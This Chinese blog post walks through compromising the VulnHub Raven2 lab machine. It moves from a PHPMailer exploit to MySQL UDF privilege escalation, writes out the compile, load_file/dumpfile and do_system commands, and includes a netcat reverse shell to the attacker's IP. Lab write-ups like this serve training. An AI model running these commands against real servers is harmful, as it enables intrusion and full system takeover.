首页 > 数据库 >vulnhub-raven2(数据库提权)

vulnhub-raven2(数据库提权)

时间:2024-01-25 10:36:33浏览次数:31  
标签:python 数据库 192.168 提权 so vulnhub udf raven2

环境准备:

kali-192.168.0.129

靶机-192.168.0.103

演示

访问web

存在一个/vendor目录,目录下可以发现使用了phpmailer

 使用searchsploit搜索,复制到当前目录。

 编辑脚本,在脚本开头加上,修改如下地方

#!/usr/bin/python
# -*- coding: utf-8 -*-

 之后python执行

 使用nc监听,并访问http://192.168.0.103/fantan.php,即可拿到shell

 接下来进行提权。

交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'

首先翻文件找到数据库配置文件

 拿到数据库账号密码。

 使用UDF来进行提权,搜索相关exp

 复制到桌面后编译

gcc -g -shared -Wl,-soname,1518.so -o udf.so 1518.c -lc

之后桌面会生成一个udf.so,用python启一个服务

python -m http.server 8080

 

连接数据库
mysql -uroot -pR@v3nSecurity
查询是否可读写
show variables like '%secure%';

发现为OFF,可以进行读写

use mysql;     #进入数据库
create table tiquan(line blob);     #创建数据表
insert into tiquan values(load_file('/tmp/udf.so'));     #插入数据
select * from tiquan into dumpfile '/usr/lib/mysql/plugin/udf.so'; #导出文件
create function do_system returns integer soname 'udf.so';    #创建自定义函数
select do_system('nc 192.168.0.129 6666 -e /bin/bash');

 

 

标签:python,数据库,192.168,提权,so,vulnhub,udf,raven2
From: https://www.cnblogs.com/re8sd/p/17986471

相关文章

  • sudo提权,ansible批量给所有主机创建系统账户,授权
    sudo(superuseroranotherdo)让普通用户可以以超级管理员或其他人的身份执行命令。sudo基本流程如下:1.管理员需要先授权(修改/etc/sudoers文件)2.普通用户以sudo的形式执行命令3.可以通过sudo-l查看授权情况修改/etc/sudoers的方法如下:1.visudo(带语法检查,默认没有颜色提示)2......
  • vulnhub-symfonos(环境变量提权)
    环境准备:靶机-192.168.0.110攻击机-192.168.0.128演示:首先nmap探测网段。 打开网站发现为一张图片没别的内容使用smbclient探测445端口内容 smbclient-L192.168.0.110-L:显示服务器端所分享出来的所有资源发现存在helios用户,和anonymous,先访问下匿名用户资源s......
  • Mysql UDF提权实验
    通过实训平台学习一下UDF提权实验环境 实验原理udf='userdefinedfunction',即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。udf在mysql5.1以后的版本中,存在于‘mysql/lib/plugin’目录下,5.1之前位于“C:\Windo......
  • WIN32 动态 UAC 提权
    UAC(UserAccountControl)是Windows平台的用户权限控制。它可以让程序使用管理员权限执行某些操作。静态UAC提权静态UAC提权让程序一直运行在管理员权限下,只要在项目设置里把"UACExecutionLevel"设置为"requireAdministrator"。这样生成的exe文件图标会自动加上......
  • vulnhub-jangow:1.0.1
    jangow:1.0.1日常练习0x01信息收集nmap老规矩扫一扫192.168.56.118存活,80端口和21端口开着。逛了一圈没看到什么有价值的信息,爆破一下路径看看。site目录刚刚看过了,.backup看看是什么这里面有数据库的账户密码,暂时不知道是用在哪。到这里没有什么有用的了。0x02FT......
  • Raven2
    扫描IP扫描服务进入网站收集信息dirsearch-u"192.168.218.137"挨个进入查看http://192.168.218.137/vendor/PATH找到flag1搜集信息php版本号邮件网站CMS为wordpress使用wpscan扫描没搜集到进入msfsearchphpmaileruse0showoptionsset变量......
  • BC实战后渗透之Bypass Applocker到提权
    0x01前言 提示:当个反面案例看就好,实际上拿下的方式远没有下文说的那么麻烦,只怪自己太心急… 本来是之前BC项目搞下来的一个推广站,当时只拿到了Shell权限是一个普通用户,想提权进一步收集服务器上的信息时,发现运行各种东西都是权限拒绝,提示组策略阻止了这个程序,当时因为还有的别......
  • vulnhub-devguru(sudo提权)
    环境准备:靶机192.168.0.100攻击机kali192.168.0.128演示使用nmap扫描全端口首先访问80端口 信息收集发现访问/.git/config存在,使用githack获取源码  访问adminer.php,为一个mysql的登录界面。 查找配置文件,找到mysql登录密码。/config/database.php 登录数......
  • vulnhub-toppo(suid提权sudo提权)
    环境准备靶机192.168.116.138攻击机kali192.168.116.130演示直接访问webadmin目录下存在密码本使用ssh连接,账号ted,密码12345ted123使用项目进行探测LinEnumhttps://github.com/rebootuser/LinEnum 存在python可以使用suid提权使用python反弹shell /usr/b......
  • vulnhub下载
    importbs4importrequests#importlogging#logging.basicConfig(level=logging.DEBUG)defsearch_items(keywork:str)->list[str]:resp=Nonetry:resp=requests.get(url="https://vulnhub.com/?q={}".format(keywork))......